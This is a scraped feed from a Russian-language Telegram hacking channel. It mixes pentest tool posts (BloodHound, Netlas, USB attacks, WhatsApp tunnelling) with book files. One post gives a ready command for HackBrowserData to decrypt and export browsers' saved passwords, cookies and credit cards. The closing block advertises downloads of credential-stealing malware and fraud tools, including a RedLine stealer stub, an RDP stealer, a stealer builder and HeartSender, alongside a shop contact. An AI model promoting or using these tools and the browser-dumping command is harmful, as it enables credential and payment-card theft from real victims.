C.I.T. Security
8.19K subscribers
2.87K photos
264 videos
4.21K files
4.14K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
Инф.войны и разведка: @cit_psyop
Курсы: @cit_course
Мусорка: https://t.iss.one/+WOFeU7VW2oYyZTI0
Боты пробива: @citsearchbot
@citsearch2bot
Download Telegram
Forwarded from S.E.Reborn
Media is too big
VIEW IN TELEGRAM
👨‍💻 Практические атаки на интерфейс USB.

• Через обычный USB-интерфейс можно делать необычные вещи. Мы разберем практические способы анализа USB-протоколов, железо и софт для отладки USB, а также специализированные инструменты для атак.

#badUSB
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from S.E.Reborn
🦮 Bloodhound. Построение векторов атак.

• Одним из самых важных инструментов, который используется практически во всех внутренних тестированиях на проникновение, является BloodHound. Если говорить простым языком, то это инструмент для визуализации данных Active Directory, который помогает пентестерам эффективно определять пути атаки, чтобы получить контроль над доменом и лесом Windows Active Directory [#AD].

• По ссылками ниже, ты найдешь полезный обзор некоторых программных средств, использующихся для автоматизированного построения вероятных атак в домене. Кроме того, будут рассмотрены некоторые подходы к улучшению уже имеющихся решений и предложен определенный алгоритм к выявлению наиболее приоритетных целей атак:

Улучшения Bloodhound;
- Пользовательские хранимые запросы;
- Добавление новых сущностей;
- Весовые коэффициенты;
- Многоуровневая архитектура безопасности;
- Объекты первоначального доступа;
- Рекомендации по противодействию BloodHound;

Управление векторами атак;
- Значимые объекты.

➡️ Читать статью: https://ardent101.github.io/

#AD #Bloodhound
Please open Telegram to view this post
VIEW IN TELEGRAM
🏌️Используй Netlas.io на максимум

Netlas это инструмент для специалистов в информационной безопасности, который помогает в исследовании веб-сайтов и другой информации в интернете, так же Netlas выполняет такие функции как анализ различных устройств и служб, включая базы данных, сетевое оборудование, веб-камеры, IoT-устройства и даже промышленные системы.

А в данном гайде, от самой компании, подробно расписано для новичков как использовать данный инструмент и как выжать из него максимум информации о чем-либо.

Читать
Chat GPT и Революция ИИ.pdf
2.4 MB
Chat GPT и Революция Искусственного
Интеллекта. 2023
Тимур Казанцев
Нейроинженерия_и_нейротехнологии_2022_Брюховецкий,_Шурдов.pdf
9.4 MB
Нейроинженерия и нейротехнологии.
А. С. Брюховецкий
CS для программиста-самоучки.pdf
3.2 MB
Computer Science для программиста-самоучки. Все что нужно знать о структурах данных и алгоритмах.
Кори Альтхофф
This media is not supported in your browser
VIEW IN TELEGRAM
📲 Wa-tunnel — туннелирование траффика через WhatsApp

Инструмент позволяющий пробрасывать ТСР- трафик через другой хост, используя туннель, работающий поверх мессенджера WhatsApp.

— Подобные манипуляции могут оказаться полезными при необходимости получения доступа к внешней сети из окружений, в которых доступен только мессенджер, или для экономии трафика при подключении к сетям или провайдерам, предоставляющим безлимитные опции для трафика мессенджеров (например, неограниченный доступ к WhatsApp предоставляется в бортовых сетях самолётов некоторых авиакомпаний).

Ссылка на GitHub

#Tunnel #TCP #WhatsApp
Совершаем анонимные звонки без SIM-карты

Как известно, использование SIM-карты идентифицирует вас c ближайшей к вам сотовой вышкой, поэтому, даже использование левой симки не решит вашу проблему, так как вы все-равно будете в сети. Также, по вышкам сотовой связи вас будет довольно просто запеленговать.

Данный вопрос можно решить используя сервисы для звонков, которые осуществляют звонок через сеть ТОR, и имеют высокую степень шифрования в сети.

Сервисы:

🔗TOX - https://tox.chat
🔗Ring - https://www.ringcentral.com
🔗Linphone - https://www.linphone.org
🔗Jitsi - https://jitsi.org
🔗Mumble - https://www.mumble.com
1
Media is too big
VIEW IN TELEGRAM
Запись сегодняшней трансляции
2023-12-21
Digital-Разведка & OSINT
Запись сегодняшней трансляции в аудио формате
https://github.com/moonD4rk/HackBrowserData

HackBrowserData это инструмент командной строки, который умеет расшифровывать и экспортировать данных из 18 браузеров на Windows, MacOS и Linux.

Извлекаемые данные:
— сохраненные пароли
— история браузера
куки пользователя
кредитные карты
история скачиваний
список расширений
localStorage
закладки

Пример использования:
hack-browser-data.exe -b chrome -f json -dir results -cc


На замену SharpChromium.
2
[ Source Code ]
==========================
[ Downloads :
Zone-H Grabber ]
[ Downloads :
RDP Stealer ]
[ Downloads :
Builder WorldWind Pro ]
[ Downloads :
Stub RedLine stealer ]
[ Downloads :
BLTools ]
[ Downloads :
HeartSender ]
[ Downloads :
Paypal Valid Email Checker ]
[ Downloads :
Stealer checker ]
==========================
[ Telegram Channel :
@clean_tools_net ]
[ Website :
www.clean-tools.net ]
[ Shop :
@RL_TheShop ]
==========================